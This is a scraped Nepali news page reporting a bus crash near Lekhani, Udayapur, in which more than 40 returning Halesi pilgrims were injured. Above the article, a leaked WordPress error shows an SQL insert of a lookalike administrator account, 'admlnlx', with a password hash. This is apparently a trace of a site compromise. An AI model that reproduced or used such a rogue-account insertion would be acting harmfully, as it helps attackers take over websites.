WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5yDgBMinwDLujpYAsj73cLGo9lLLq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:54:07', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
हलेसीका तिर्थयात्री बोकेको बस दुर्घटनामा – Gaule Khabar

हलेसीका तिर्थयात्री बोकेको बस दुर्घटनामा

हलेसीका तिर्थयात्री बोकेको बस दुर्घटनामा

काठमान्डौं,मंसिर २४ –

खोटाङको प्रसिद्ध हलेसी महादेवको दर्शन गरेर फर्किदै गरेका तीर्थयात्री बोकेको बस उदयपुरको लेखानीमा दुर्घटना भएको छ ।

तीर्थयात्री बोकेर सप्तरी फर्किदै गरेको बस लेखानीको भदौरेमा दुर्घटना भएको हो ।

दुर्घटनामा ४० भन्दा बढी यात्रु घाइते भएको र तीनजनाकाे अवस्था गम्भिर  रहेको स्थानीयले बताएका छन् ।

घटनास्थलमा उद्दार टोली गएकाले थप विवरण आउन बाँकी छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका